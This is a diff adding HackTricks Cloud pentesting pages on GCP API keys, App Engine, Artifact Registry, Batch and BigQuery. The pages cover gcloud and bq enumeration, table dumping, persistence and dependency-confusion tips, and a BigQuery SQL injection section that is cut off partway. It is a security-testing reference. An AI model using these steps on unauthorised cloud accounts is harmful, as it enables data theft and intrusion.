+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data.
+
+### Restrictions
+
+You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP.
+
+### Enumeration
+
+It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe:
+
+```bash
+gcloud services api-keys list
+gcloud services api-keys describe <key-uuid>
+gcloud services api-keys list --show-deleted
+```
+
+{% hint style="info" %}
+It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys.
+{% endhint %}
+
+### Privilege Escalation & Post Exploitation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %}
+[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Enum
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %}
+[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %}
+[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
new file mode 100644
index 0000000000..3f78b88ec1
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md
@@ -0,0 +1,146 @@
+# GCP - App Engine Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information <a href="#reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a>
+
+Google Cloud Platform's (GCP) App Engine is a **robust, serverless platform tailored for the development and hosting of web applications on a large scale**. The design of this platform focuses on streamlining the development process and enhancing the manageability of applications. The key features and benefits of GCP's App Engine include:
+
+1. **Serverless Architecture**: App Engine automatically handles the infrastructure, including server provisioning, configuration, and scaling. This allows developers to focus on writing code without worrying about the underlying hardware.
+2. **Automatic Scaling**: App Engine can automatically scale your application in response to the amount of traffic it receives. It scales up to handle increased traffic and scales down when traffic decreases, helping optimize cost and performance.
+3. **Language and Runtime Support**: It supports popular programming languages such as Java, Python, Node.js, Go, Ruby, PHP, and .NET. You can run your applications in a standard or a flexible environment. The standard environment is more restrictive but highly optimized for specific languages, while the flexible environment allows for more customization.
+4. **Integrated Services**: App Engine integrates with many other GCP services, like Cloud SQL, Cloud Storage, Cloud Datastore, and more. This integration simplifies the architecture of cloud-based applications.
+5. **Versioning and Traffic Splitting**: You can easily deploy multiple versions of your application and then split traffic among them for A/B testing or gradual rollouts.
+6. **Application Insights**: App Engine provides built-in services such as logging, user authentication, and a suite of developer tools for monitoring and managing applications.
+7. **Security**: It offers built-in security features like application versioning, SSL/TLS certificates for secure connections, and identity and access management.
+
+### Firewall
+
+A simple **firewall** can be configured for the instances running the Apps with the following options:
+
+<figure><img src="../../../.gitbook/assets/image (246).png" alt=""><figcaption></figcaption></figure>
+
+### SA
+
+The default service account used by these Apps is **`<proj-name>@appspot.gserviceaccount.com`** which have **Editor** role over the project and the SAs inside APP Engine instance **runs with cloud-platform scope (among others).**
+
+### Storage
+
+The source code and metadata is **automatically stored in buckets** with names such as `<proj-id>.appspot.com` and `staging.<proj-id>.appspot.com` and `<country>.<proj-id>.appspot.com`
+
+**Every file** of the App is stored with the **sha1 of the content as filename**:
+
+<figure><img src="../../../.gitbook/assets/image (82).png" alt=""><figcaption></figcaption></figure>
+
+Inside the **`ae`** folder from `staging.<proj-id>.appspot.com`, **one folder per version exist** with the **source code** files and **`manifest.json`** file that **describes the components** of the App:
+
+{% code overflow="wrap" %}
+```json
+{"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ...
+```
+{% endcode %}
+
+### Containers
+
+The web app will ultimately be **executed inside a container** and **Code Build** is used to build the container.
+
+### URLs & Regions
+
+The **default** web page will be exposed in the URL **`<project-uniq-name>.appspot.com`** although the URL of older versions will be slightly different, like **`https://20240117t001540-dot-<project-uniq-name>.uc.r.appspot.com`** (note the initial timestamp).
+
+It might look like it's only possible to deploy 1 app engine web application per region, but it's possible to indicate **`service: <servicename>`** in the **`app.yml`** and create a new service (a new web). The format of the URL for this new web will be **`<servicename>-dot-<project-uniq-name>.appspot.com`**.
+
+### Enumeration
+
+{% hint style="danger" %}
+Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**.
+{% endhint %}
+
+As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an **`app.yaml`** file which can be accessed as follows:
+
+```bash
+# List the apps
+gcloud app services list
+gcloud app services describe <app-name>
+# Access via browser to the specified app
+gcloud app services browse <app-name>
+
+# Get App versions
+gcloud app versions list
+# Get all the info of the app and version, included specific verion URL and the env
+gcloud app versions describe -s <app-name> <version-id>
+
+# Logs
+gcloud app logs tail -s <app-name>
+
+# Instances
+## This is only valid if a flexible environment is used and not a standard one
+gcloud app instances list
+gcloud app instances describe -s <app-name> --version <version-id> <ID>
+## Connect to the instance via ssh
+gcloud app instances ssh --service <app-name> --version <version-id> <ID>
+
+# Firewalls
+gcloud app firewall-rules list
+gcloud app firewall-rules describe <num_fw>
+
+# Get domains
+gcloud app domain-mappings list
+gcloud app domain-mappings describe <name>
+
+# SSl certificates
+gcloud app ssl-certificates list
+gcloud app ssl-certificates describe <name>
+```
+
+### Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-appengine-privesc.md" %}
+[gcp-appengine-privesc.md](../gcp-privilege-escalation/gcp-appengine-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Enum
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md" %}
+[gcp-app-engine-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-app-engine-post-exploitation.md" %}
+[gcp-app-engine-post-exploitation.md](../gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-app-engine-persistence.md" %}
+[gcp-app-engine-persistence.md](../gcp-persistence/gcp-app-engine-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
new file mode 100644
index 0000000000..43b6b86a4b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md
@@ -0,0 +1,118 @@
+# GCP - Artifact Registry Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Artifact Registry is a fully managed service that allows you to **manage, store, and secure your software artifacts**. It's essentially a repository for **storing build dependencies**, such as **Docker** images, **Maven**, npm packages, and other types of artifacts. It's **commonly used in CI/CD pipelines** for storing and versioning the artifacts produced during the software development process.
+
+Key features of Artifact Registry include:
+
+1. **Unified Repository**: It supports **multiple types of artifacts**, allowing you to have a single repository for Docker images, language packages (like Java’s Maven, Node.js’s npm), and other types of artifacts, enabling consistent access controls and a unified view across all your artifacts.
+2. **Fully Managed**: As a managed service, it takes care of the underlying infrastructure, scaling, and security, reducing the maintenance overhead for users.
+3. **Fine-grained Access Control**: It integrates with Google Cloud’s Identity and Access Management (IAM), allowing you to define who can access, upload, or download artifacts in your repositories.
+4. **Geo-replication**: It supports the replication of artifacts across multiple regions, improving the speed of downloads and ensuring availability.
+5. **Integration with Google Cloud Services**: It works seamlessly with **other GCP services like Cloud Build, Kubernetes Engine, and Compute Engine**, making it a convenient choice for teams already working within the Google Cloud ecosystem.
+6. **Security**: Offers features like **vulnerability scanning and container analysis** to help ensure that the stored artifacts are secure and free from known security issues.
+
+### Formats and Modes
+
+When creating a new repository it's possible to **select a the format/type** of the repository among several like Docker, Maven, npm, Python... and the mode which usually can be one of these three:
+
+* **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem.
+* **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts.
+* **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories.
+  * For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used).
+  * You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.**
+
+Note that in the **Remote version of Docker** it's possible to give a username and token to access Docker Hub. The **token is then stored in the Secret Manager**.
+
+### Encryption
+
+As expected, by default a Google-managed key is used but a Customer-managed key can be indicated (CMEK).
+
+### Cleanup Policies
+
+* **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria.
+* **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging.
+
+### Vulnerability Scanning
+
+It's possible to enable the **vulnerability scanner** which will check for vulnerabilities inside **container images**.
+
+### Enumeration
+
+```bash
+# Get repositories
+gcloud artifacts repositories list
+gcloud artifacts repositories describe --location <location> <repo-name>
+gcloud artifacts versions list --repository=<repo-name> -location <location> --package <package-name>
+
+# Get settings of a repository (example using python but could be other)
+gcloud artifacts print-settings python --repository <repo-name> --location <location>
+
+# Get docker images
+gcloud artifacts docker images list us-central1-docker.pkg.dev/<proj-name>/<repo-name>
+
+# Get packages (like python and others...)
+gcloud artifacts packages list --repository <repo-name> --location <location>
+
+# Get SBOMB artifacts
+gcloud artifacts sbom list
+
+# Get vulnerabilities (docker images)
+gcloud artifacts vulnerabilities list us-east1-docker.pkg.dev/project123/repository123/someimage@sha256:49765698074d6d7baa82f
+gcloud artifacts docker images list-vulnerabilities projects/<proj-name>/locations/<location>/scans/<scan-uuid>
+```
+
+### Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %}
+[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md" %}
+[gcp-artifact-registry-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post-Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md" %}
+[gcp-artifact-registry-post-exploitation.md](../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
+[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
new file mode 100644
index 0000000000..4cb12e714b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md
@@ -0,0 +1,63 @@
+# GCP - Batch Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations.
+
+### Service Account
+
+Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually).
+
+## Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# List jobs
+gcloud batch jobs list
+
+# Get job info
+gcloud batch jobs describe <job-name> --location <location>
+
+# List tasks
+gcloud batch tasks list --location <location> --job <job-name>
+
+# Gte info of tasks executions
+gcloud batch tasks describe projects/<proj-number>/locations/<location>/jobs/<job-name>/taskGroups/<group>/tasks/<num>
+```
+{% endcode %}
+
+## Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %}
+[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
new file mode 100644
index 0000000000..e6154ba776
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md
@@ -0,0 +1,266 @@
+# GCP - Bigquery Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud BigQuery is a **fully-managed, serverless enterprise data warehouse**, offering capabilities for **analysis over petabytes** of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.
+
+It supports querying using **ANSI SQL**. The main objects are **datasets** containing **tables** containing SQL **data**.
+
+### Encryption
+
+By default a **Google-managed encryption key** is used although it's possible to configure a **Customer-managed encryption key (CMEK)**. It's possible to indicate the encryption key per dataset and per table inside a dataset.
+
+### Expiration
+
+It's possible to indicate an **expiration time in the dataset** so any new table created in this dataset will be **automatically deleted** the specified number of days after creation.
+
+### External Sources
+
+Bigquery is deeply integrated with other Google services. It's possible to load data from buckets, pub/sub, google drive, RDS databases...
+
+### Dataset ACLs
+
+When a dataset is created **ACLs are attached** to give access over it. By default it's given **Owner** privileges over the **user that created** the dataset and then **Owner** to the group **projectOwners** (Owners of the project), **Writer** to the group **projectWriters,** and **Reader** to the group **projectReaders**:
+
+```bash
+bq show --format=prettyjson <proj>:<dataset>
+
+...
+"access": [
+    {
+      "role": "WRITER",
+      "specialGroup": "projectWriters"
+    },
+    {
+      "role": "OWNER",
+      "specialGroup": "projectOwners"
+    },
+    {
+      "role": "OWNER",
+      "userByEmail": "gcp-admin@hacktricks.xyz"
+    },
+    {
+      "role": "OWNER",
+      "userByEmail": "support@hacktricks.xyz"
+    },
+    {
+      "role": "READER",
+      "specialGroup": "projectReaders"
+    }
+  ],
+  ...
+```
+
+### Table Rows Control Access
+
+It's possible to **control the rows a principal is going to be able to access inside a table** with row access policies. These are defined inside the table using [**DDL**](https://cloud.google.com/bigquery/docs/reference/standard-sql/data-definition-language#create_row_access_policy_statement).\
+The access policy defines a filter and **only the matching rows** with that filter are going to be **accessible** by the indicated principals.
+
+```sql
+# Create
+CREATE ROW ACCESS POLICY apac_filter
+ON project.dataset.my_table
+GRANT TO ('user:abc@example.com')
+FILTER USING (region = 'APAC');
+
+# Update
+CREATE OR REPLACE ROW ACCESS POLICY
+CREATE ROW ACCESS POLICY sales_us_filter
+ON project.dataset.my_table
+GRANT TO ('user:john@example.com',
+          'group:sales-us@example.com',
+          'group:sales-managers@example.com')
+FILTER USING (region = 'US');
+
+# Check the Post Exploitation tricks to see how to call this from the cli
+```
+
+```bash
+# Enumerate row policies on a table
+bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
+```
+
+### Columns Access Control
+
+<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
+
+To restrict data access at the column level:
+
+1. **Define a taxonomy and policy tags**. Create and manage a taxonomy and policy tags for your data. [https://console.cloud.google.com/bigquery/policy-tags](https://console.cloud.google.com/bigquery/policy-tags)
+2. Optional: Grant the **Data Catalog Fine-Grained Reader role to one or more principals** on one or more of the policy tags you created.
+3. **Assign policy tags to your BigQuery columns**. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access.
+4. **Enforce access control on the taxonomy**. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
+5. **Manage access on the policy tags**. Use [Identity and Access Management](https://cloud.google.com/iam) (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
+
+When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**.
+
+{% hint style="success" %}
+As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag.
+{% endhint %}
+
+To enforce access control on the taxonomy it's needed to enable the service:
+
+```bash
+gcloud services enable bigquerydatapolicy.googleapis.com
+```
+
+It's possible to see the tags of columns with:
+
+{% code overflow="wrap" %}
+```bash
+bq show --schema <proj>:<dataset>.<table>
+
+[{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}]
+```
+{% endcode %}
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Dataset info
+bq ls # List datasets
+bq ls -a # List all datasets (even hidden)
+bq ls <proj>:<dataset> # List tables in a dataset
+bq show --format=prettyjson <proj>:<dataset> # Get info about the dataset (like ACLs)
+
+# Tables info
+bq show --format=prettyjson <proj>:<dataset>.<table> # Get table info
+bq show --schema <proj>:<dataset>.<table>  # Get schema of a table
+
+# Get entries from the table
+bq head <dataset>.<table>
+bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
+bq extract <dataset>.<table> "gs://<bucket>/table*.csv" # Use the * so it can dump everything in different files
+
+# Insert data
+bq query --nouse_legacy_sql 'INSERT INTO `digital-bonfire-410512.importeddataset.tabletest` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
+bq insert dataset.table /tmp/mydata.json
+
+# Get permissions
+bq get-iam-policy <proj>:<dataset> # Get dataset IAM policy
+bq show --format=prettyjson <proj>:<dataset> # Get dataset ACLs
+bq get-iam-policy <proj>:<dataset>.<table> # Get table IAM policy
+bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
+
+# Taxonomies (Get the IDs from the shemas of the tables)
+gcloud data-catalog taxonomies describe <taxonomi-ID> --location=<location>
+gcloud data-catalog taxonomies list --location <location> #Find more
+gcloud data-catalog taxonomies get-iam-policy <taxonomi-ID> --location=<location>
+
+# Get jobs executed
+bq ls --jobs=true --all=true
+bq show --location=<location> show --format=prettyjson --job=true <job-id>
+
+# Misc
+bq show --encryption_service_account # Get encryption service account
+```
+{% endcode %}
+
+### BigQuery SQL Injection
+
+For further information you can check the blog post: [https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac). Here just some details are going to be given.
+
+**Comments**:
+
+* `select 1#from here it is not working`
+* `select 1/*between those it is not working*/` But just the initial one won't work
+* `select 1--from here it is not working`
+
+Get **information** about the **environment** such as:
+
+* Current user: `select session_user()`
+* Project id: `select @@project_id`
+
+Concat rows:
+
+* All table names: `string_agg(table_name, ', ')`
+
+Get **datasets**, **tables** and **column** names:
+
+* **Project** and **dataset** name:
+
+{% code overflow="wrap" %}
+```sql
+SELECT catalog_name, schema_name FROM INFORMATION_SCHEMA.SCHEMATA
+```
+{% endcode %}
+
+* **Column** and **table** names of **all the tables** of the dataset:
+
+{% code overflow="wrap" %}
+```sql
+# SELECT table_name, column_name FROM <proj-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
+
